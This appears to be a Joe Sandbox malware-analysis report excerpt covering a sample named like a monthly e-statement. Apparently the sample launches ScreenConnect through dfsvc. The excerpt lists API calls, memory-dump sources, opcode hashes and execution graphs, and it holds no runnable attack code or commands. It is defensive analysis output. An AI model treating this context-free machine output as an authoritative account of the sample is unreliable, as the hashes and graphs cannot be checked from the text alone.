                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F22594,00000000,?,00F31B50,?,?,?,00F22737,00000004,InitializeCriticalSectionEx,00F2BC48,InitializeCriticalSectionEx), ref: 00F225F0
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00F22594,00000000,?,00F31B50,?,?,?,00F22737,00000004,InitializeCriticalSectionEx,00F2BC48,InitializeCriticalSectionEx,00000000,?,00F224C7), ref: 00F225FA
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F22622
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                    • Opcode ID: 45a0ca4cd689051ba70884c0ff27b77f0f186e7df11349819d4c014b84ce28ca
                                                                                                                                                                                                                                                                    • Instruction ID: 9c30e72885f4c53858fa6c693dc00ed0a5286033ac0cab700feb442685104dd5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a0ca4cd689051ba70884c0ff27b77f0f186e7df11349819d4c014b84ce28ca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31E04832640318BBEF225B60FC06F593F55AB10B51F104420FE0DE80E1E7A6E955B589
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00F25784,00000000,00000000,00000000,00000000,?,00F25981,00000006,FlsSetValue), ref: 00F2580F
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00F25784,00000000,00000000,00000000,00000000,?,00F25981,00000006,FlsSetValue,00F2C4D8,FlsSetValue,00000000,00000364,?,00F244F6), ref: 00F2581B
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F25784,00000000,00000000,00000000,00000000,?,00F25981,00000006,FlsSetValue,00F2C4D8,FlsSetValue,00000000), ref: 00F25829
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5e6a951ecd4180a4aa1c3d9ce6337f60dea3fc738c9ed276c755f00192bc9f0d
                                                                                                                                                                                                                                                                    • Instruction ID: 8112b66457f074c8cf143cca758d68437298885d3b6fc9df982f0420200c5403
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e6a951ecd4180a4aa1c3d9ce6337f60dea3fc738c9ed276c755f00192bc9f0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D01A733A1563AABC7318A68BC44A977798AF45FB17250624FE1AD7140DB70DC01E6E0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24A27
                                                                                                                                                                                                                                                                      • Part of subcall function 00F2474D: IsProcessorFeaturePresent.KERNEL32(00000017,00F2473C,00000000,?,00000004,00000000,?,?,?,?,00F24749,00000000,00000000,00000000,00000000,00000000), ref: 00F2474F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F2474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00F24771
                                                                                                                                                                                                                                                                      • Part of subcall function 00F2474D: TerminateProcess.KERNEL32(00000000), ref: 00F24778
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                    • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                    • Instruction ID: 052224109b20c86126b0869529e6b377f341f5cd5a1c872c83f1498b911059f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B51B375E002299FDF14DFA8DC81AAEBBB4EF48310F244169E454E7340E675AE41AB50

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:17.5%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                    Total number of Nodes:621
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:80
51102->51104 51103 7ffaac4a2ea6 51104->51103 51105 7ffaac475990 LoadLibraryExW 51104->51105 51105->51103 51110 7ffaac4733dd 51106->51110 51107 7ffaac473774 51132 7ffaac473c81 51107->51132 51109 7ffaac47378e 51109->51087 51110->51107 51118 7ffaac472f18 51110->51118 51112 7ffaac4734b6 51123 7ffaac472f68 51112->51123 51114 7ffaac4734cb 51114->51107 51128 7ffaac472f80 51114->51128 51116 7ffaac47370a 51117 7ffaac472f80 LoadLibraryExW 51116->51117 51117->51107 51119 7ffaac472f1d 51118->51119 51120 7ffaac472f5a 51119->51120 51121 7ffaac472f00 LoadLibraryExW 51119->51121 51120->51112 51122 7ffaac475929 51121->51122 51122->51112 51124 7ffaac472f6d 51123->51124 51125 7ffaac472f84 51124->51125 51126 7ffaac472f00 LoadLibraryExW 51124->51126 51125->51114 51127 7ffaac475929 51126->51127 51127->51114 51129 7ffaac4758a0 51128->51129 51130 7ffaac472f00 LoadLibraryExW 51129->51130 51131 7ffaac475929 51130->51131 51131->51116 51133 7ffaac473cae 51132->51133 51134 7ffaac472e48 LoadLibraryExW 51133->51134 51135 7ffaac473d19 51134->51135 51135->51109 51320 7ffaac4b6375 51321 7ffaac4b6384 51320->51321 51324 7ffaac4b5f50 51321->51324 51323 7ffaac4b6399 51327 7ffaac4b7b40 51324->51327 51325 7ffaac4853d0 LoadLibraryExW 51326 7ffaac4b7c35 51325->51326 51328 7ffaac477de0 LoadLibraryExW 51326->51328 51327->51325 51329 7ffaac4b7c47 51328->51329 51330 7ffaac474c90 LoadLibraryExW 51329->51330 51331 7ffaac4b7c80 51330->51331 51331->51323 50981 7ffaac4799eb 50982 7ffaac4799f7 CreateFileW 50981->50982 50984 7ffaac479b2c 50982->50984 50985 7ffaac4b9fed 50986 7ffaac4ba00f 50985->50986 50987 7ffaac474c90 LoadLibraryExW 50986->50987 50988 7ffaac4ba03a 50986->50988 50987->50988 50861 7ffaac4b302d 50863 7ffaac4b3032 50861->50863 50862 7ffaac4b3194 50863->50862 50864 7ffaac474c90 LoadLibraryExW 50863->50864 50865 7ffaac4b318b 50864->50865 51136 7ffaac4b04ad 51137 7ffaac4b04cf 51136->51137 51138 7ffaac4773d0 LoadLibraryExW 51137->51138 51139 7ffaac4b051e 51138->51139 51140 7ffaac474c90 LoadLibraryExW 
51139->51140 51141 7ffaac4b0548 51140->51141 51142 7ffaac474c90 LoadLibraryExW 51141->51142 51143 7ffaac4b0572 51142->51143 51144 7ffaac474c90 LoadLibraryExW 51143->51144 51145 7ffaac4b059c 51144->51145 51146 7ffaac474c90 LoadLibraryExW 51145->51146 51147 7ffaac4b05c6 51146->51147 51332 7ffaac4a806a 51333 7ffaac4a806f 51332->51333 51334 7ffaac4773d0 LoadLibraryExW 51333->51334 51335 7ffaac4a80b0 51334->51335 51336 7ffaac474c90 LoadLibraryExW 51335->51336 51337 7ffaac4a819c 51335->51337 51338 7ffaac4a813d 51336->51338 51339 7ffaac474c90 LoadLibraryExW 51338->51339 51339->51337 50866 7ffaac473d36 50867 7ffaac473d3d 50866->50867 50872 7ffaac472e48 50867->50872 50869 7ffaac473e2a 50878 7ffaac472e20 50869->50878 50873 7ffaac473e70 50872->50873 50885 7ffaac472e08 50873->50885 50875 7ffaac473ec9 50875->50869 50876 7ffaac473e8a 50876->50875 50889 7ffaac472e30 50876->50889 50880 7ffaac472e25 50878->50880 50879 7ffaac472e59 50880->50879 50881 7ffaac472e08 LoadLibraryExW 50880->50881 50883 7ffaac473e8a 50881->50883 50882 7ffaac473e4c 50883->50882 50884 7ffaac472e30 LoadLibraryExW 50883->50884 50884->50882 50886 7ffaac473f30 50885->50886 50887 7ffaac4715c8 LoadLibraryExW 50886->50887 50888 7ffaac473f55 50887->50888 50888->50876 50891 7ffaac472e35 50889->50891 50890 7ffaac472e59 50891->50890 50892 7ffaac472e08 LoadLibraryExW 50891->50892 50894 7ffaac473e8a 50892->50894 50893 7ffaac473ec9 50893->50875 50894->50893 50895 7ffaac472e30 LoadLibraryExW 50894->50895 50895->50893 50896 7ffaac4c362a 50898 7ffaac4c3637 50896->50898 50897 7ffaac4c3689 50900 7ffaac4c36c6 50897->50900 50901 7ffaac487700 LoadLibraryExW 50897->50901 50903 7ffaac4c36fe 50897->50903 50898->50897 50898->50903 50904 7ffaac487700 50898->50904 50902 7ffaac487700 LoadLibraryExW 50900->50902 50900->50903 50901->50900 50902->50903 50905 7ffaac487728 50904->50905 50910 7ffaac478fd0 50905->50910 50907 7ffaac487736 50908 7ffaac476978 LoadLibraryExW 50907->50908 50909 7ffaac487749 50908->50909 50909->50897 50911 
7ffaac477de0 LoadLibraryExW 50910->50911 50912 7ffaac478fe7 50910->50912 50911->50912 51148 7ffaac48a1af 51149 7ffaac48a1c3 51148->51149 51154 7ffaac476160 51149->51154 51151 7ffaac48a557 51152 7ffaac48a1cb 51152->51151 51158 7ffaac476170 51152->51158 51155 7ffaac476165 51154->51155 51156 7ffaac48ecb0 LoadLibraryExW 51155->51156 51157 7ffaac4761b9 51155->51157 51156->51157 51157->51152 51159 7ffaac476175 51158->51159 51160 7ffaac48ecb0 LoadLibraryExW 51159->51160 51161 7ffaac4a5ae4 51159->51161 51160->51161 51161->51151 51340 7ffaac474b75 51341 7ffaac474b7f 51340->51341 51342 7ffaac473f30 LoadLibraryExW 51341->51342 51343 7ffaac474bad 51342->51343 50989 7ffaac4a16e2 50990 7ffaac4a16ea 50989->50990 50991 7ffaac4a170b 50989->50991 50990->50991 50992 7ffaac4a176c 50990->50992 50993 7ffaac474c90 LoadLibraryExW 50991->50993 50995 7ffaac474c90 LoadLibraryExW 50992->50995 50999 7ffaac4a1761 50993->50999 50994 7ffaac4a1b30 51001 7ffaac4a17c2 50995->51001 50996 7ffaac4a1af4 50996->50994 50997 7ffaac474c90 LoadLibraryExW 50996->50997 50997->50994 50998 7ffaac4a1b44 50999->50996 51000 7ffaac474c90 LoadLibraryExW 50999->51000 51005 7ffaac4a19ae 51000->51005 51001->50998 51001->50999 51002 7ffaac474c90 LoadLibraryExW 51001->51002 51003 7ffaac4a18b7 51002->51003 51003->50999 51004 7ffaac474c90 LoadLibraryExW 51003->51004 51004->50999 51005->50996 51005->50998 51006 7ffaac474c90 LoadLibraryExW 51005->51006 51006->50996 51162 7ffaac4b15a5 51164 7ffaac4b15bf 51162->51164 51163 7ffaac4b15e0 51164->51163 51167 7ffaac4b16f2 51164->51167 51169 7ffaac4a6fc0 51164->51169 51166 7ffaac4b1754 51167->51166 51172 7ffaac4b1e57 LoadLibraryExW 51167->51172 51170 7ffaac477de0 LoadLibraryExW 51169->51170 51171 7ffaac4a6fd5 51169->51171 51170->51171 51171->51167 51172->51166 50913 7ffaac48e725 50914 7ffaac48e72f 50913->50914 50917 7ffaac476168 50914->50917 50916 7ffaac48e764 50918 7ffaac47616d 50917->50918 50919 7ffaac48ecb0 LoadLibraryExW 50918->50919 50920 7ffaac4a5ae4 50918->50920 50919->50920 
50920->50916 51177 7ffaac4c3d9d 51178 7ffaac4c3da7 51177->51178 51179 7ffaac474c90 LoadLibraryExW 51178->51179 51180 7ffaac4c3e60 51179->51180 51181 7ffaac474c90 LoadLibraryExW 51180->51181 51182 7ffaac4c3e97 51181->51182 51183 7ffaac474c90 LoadLibraryExW 51182->51183 51184 7ffaac4c3ecf 51183->51184 51185 7ffaac487700 LoadLibraryExW 51184->51185 51186 7ffaac4c3f16 51184->51186 51185->51186 51187 7ffaac487700 LoadLibraryExW 51186->51187 51188 7ffaac4c3fab 51186->51188 51187->51188 51189 7ffaac487700 LoadLibraryExW 51188->51189 51190 7ffaac4c402b 51188->51190 51189->51190 51191 7ffaac487700 LoadLibraryExW 51190->51191 51192 7ffaac4c40ab 51190->51192 51191->51192 51193 7ffaac487700 LoadLibraryExW 51192->51193 51194 7ffaac4c412b 51192->51194 51193->51194 51195 7ffaac487700 LoadLibraryExW 51194->51195 51196 7ffaac4c41ab 51194->51196 51195->51196 51197 7ffaac487700 LoadLibraryExW 51196->51197 51198 7ffaac4c422b 51196->51198 51197->51198 51199 7ffaac487700 LoadLibraryExW 51198->51199 51200 7ffaac4c42c4 51198->51200 51199->51200 51201 7ffaac487700 LoadLibraryExW 51200->51201 51202 7ffaac4c435d 51200->51202 51201->51202 51203 7ffaac487700 LoadLibraryExW 51202->51203 51205 7ffaac4c43f6 51202->51205 51203->51205 51204 7ffaac487700 LoadLibraryExW 51206 7ffaac4c44a8 51204->51206 51205->51204 51205->51206 51207 7ffaac487700 LoadLibraryExW 51206->51207 51209 7ffaac4c4541 51206->51209 51207->51209 51208 7ffaac487700 LoadLibraryExW 51208->51209 51209->51208 51210 7ffaac4c4701 51209->51210 51211 7ffaac4795a5 51213 7ffaac4795bf 51211->51213 51212 7ffaac4795e8 51213->51212 51216 7ffaac471518 51213->51216 51215 7ffaac479670 51217 7ffaac471521 51216->51217 51218 7ffaac471802 LoadLibraryExW 51217->51218 51220 7ffaac471683 51217->51220 51219 7ffaac471836 51218->51219 51219->51215 51220->51215 51344 7ffaac4ba761 51345 7ffaac4ba784 51344->51345 51346 7ffaac4ba732 51345->51346 51350 7ffaac4ba79e 51345->51350 51354 7ffaac472f78 LoadLibraryExW 51346->51354 51348 7ffaac4ba74f 51349 7ffaac4ba7d1 
51356 7ffaac472f78 LoadLibraryExW 51349->51356 51350->51349 51355 7ffaac476158 LoadLibraryExW 51350->51355 51353 7ffaac4ba875 51354->51348 51355->51349 51356->51353
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3179309726.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac470000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 2N_I
                                                                                                                                                                                                                                                                    • API String ID: 0-859961171
                                                                                                                                                                                                                                                                    • Opcode ID: 6ecca39084fdeb0db7d1783318b8ac2138390ff48732240d2477755e6be67f45
                                                                                                                                                                                                                                                                    • Instruction ID: 76d15595e2b2befb02cc41f9601fe0995d596c3197ac67bab95df182bed72378
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ecca39084fdeb0db7d1783318b8ac2138390ff48732240d2477755e6be67f45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DC134A2E0EBD58FF74997A8581D2796FE1EF52314B0881BAD04EC7197ED28D80983C5
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3179309726.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac470000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookieInternet
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 930238652-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3573defc85e36c70e32be05f1d335bd587f4f875884aed76b9300ccc75b41e88
                                                                                                                                                                                                                                                                    • Instruction ID: 3c29d8e6e560082752a682e36087b7409881dcde8602c81f0e941640b266969d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3573defc85e36c70e32be05f1d335bd587f4f875884aed76b9300ccc75b41e88
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3191D230509A8D8FEB69DF28C8597F53BE1FF59311F04826FD84EC7292CA74A9458B81
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3179309726.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac470000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6cf2ba8167380e1db1d1b6297ec42cf490535f433c7a5e6d7fbb103eaec53ce4
                                                                                                                                                                                                                                                                    • Instruction ID: c166993cd3aa7bb993b39db269243d693abf78ea00fdd3b334f2880935d91140
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf2ba8167380e1db1d1b6297ec42cf490535f433c7a5e6d7fbb103eaec53ce4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8051917191CA5C8FDB68EF58D845BE9BBE0FB69310F1481AEE04DD3252CB34A945CB81
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3178810746.00007FFAAC35D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC35D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac35d000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 837f0bcc348962f7761fc8a4dc500f131d0a1c5ddb690ea9b3fcd420d4fdb504
                                                                                                                                                                                                                                                                    • Instruction ID: 11df4f20aebd56ef31d3005180746197e6a8ed9f6c1770d5197e87f36845615d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837f0bcc348962f7761fc8a4dc500f131d0a1c5ddb690ea9b3fcd420d4fdb504
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0141287180DBC48FE356CB2898459527FF0EF47320B1541EFD088CB1A7DA29E84AC7A2

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:13.5%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                    Total number of Nodes:12
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                    execution_graph 10675 7ffaac454890 10676 7ffaac454899 GetTokenInformation 10675->10676 10678 7ffaac46f2d7 10676->10678 10679 7ffaac453dfa 10680 7ffaac46f470 CloseHandle 10679->10680 10682 7ffaac46f4eb 10680->10682 10683 7ffaac45f67b 10684 7ffaac45f687 CreateFileW 10683->10684 10686 7ffaac45f7bc 10684->10686 10687 7ffaac4584b8 10688 7ffaac4584bf SetProcessMitigationPolicy 10687->10688 10690 7ffaac458552 10688->10690

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 252 7ffaac454890-7ffaac4548d9 258 7ffaac4548dc 252->258 258->258 259 7ffaac4548de-7ffaac454949 258->259 267 7ffaac45494c 259->267 267->267 268 7ffaac45494e-7ffaac46f2d5 GetTokenInformation 267->268 274 7ffaac46f2dd-7ffaac46f30e 268->274 275 7ffaac46f2d7 268->275 275->274
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4757e2f96637380675e55542bd1a267824a85f485e5e62f19f22bf15a63028ad
                                                                                                                                                                                                                                                                    • Instruction ID: 185a8f631554f064d2370c9e20ff274ec76e80c367e218cef337835451b53f1d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4757e2f96637380675e55542bd1a267824a85f485e5e62f19f22bf15a63028ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B6127B291EBC48FE719879C581A2B87FE0EB96314F0441BFE04D8729BC924DC0983D6

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    control_flow_graph 365 7ffaac45f67b-7ffaac45f710 370 7ffaac45f71a-7ffaac45f7ba CreateFileW 365->370 371 7ffaac45f712-7ffaac45f717 365->371 373 7ffaac45f7bc 370->373 374 7ffaac45f7c2-7ffaac45f7f5 370->374 371->370 373->374
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: ef750e298dc935e2f0435bf4eb61b2960acab1e7308ab6f6deb115ae447eef82
                                                                                                                                                                                                                                                                    • Instruction ID: abdc122b1efbbf2ad6801b19e62690b67d409a2a11fa30761efd1f7cb8985117
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef750e298dc935e2f0435bf4eb61b2960acab1e7308ab6f6deb115ae447eef82
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B651917190CA5C8FEB68DF58D849BE9BBE0FB59314F1441AEE04DD3252CB34A845CB81

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    control_flow_graph 466 7ffaac4584b8-7ffaac458550 SetProcessMitigationPolicy 469 7ffaac458558-7ffaac458587 466->469 470 7ffaac458552 466->470 470->469
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: 03e5658e8c13cf9d80e2e7458a6d951db040932c65722eb409eed00db6274168
                                                                                                                                                                                                                                                                    • Instruction ID: 6ae06b198909ed2372e9a3624e215c88d74c9b77677bfc9a2c3abbf8c8f2c125
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03e5658e8c13cf9d80e2e7458a6d951db040932c65722eb409eed00db6274168
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3831D77191CB188FDB28DF9CDC4A9F9BBE0EB55711F00412FE44AD3252DB74A8458B81

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    control_flow_graph 472 7ffaac453eaa-7ffaac4584ef 474 7ffaac4584f6-7ffaac458550 SetProcessMitigationPolicy 472->474 475 7ffaac458558-7ffaac458587 474->475 476 7ffaac458552 474->476 476->475
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                                                                                    • Instruction ID: 3a90cf094fbbbad0c35cbe15fd3eaed28466402bfcebbd5c5d67a0ff1f1d59a7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB21B97191CB188FDB189F9DDC4A9F97BE0EB55711F00413EE04AD3251DB74B8458B91
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
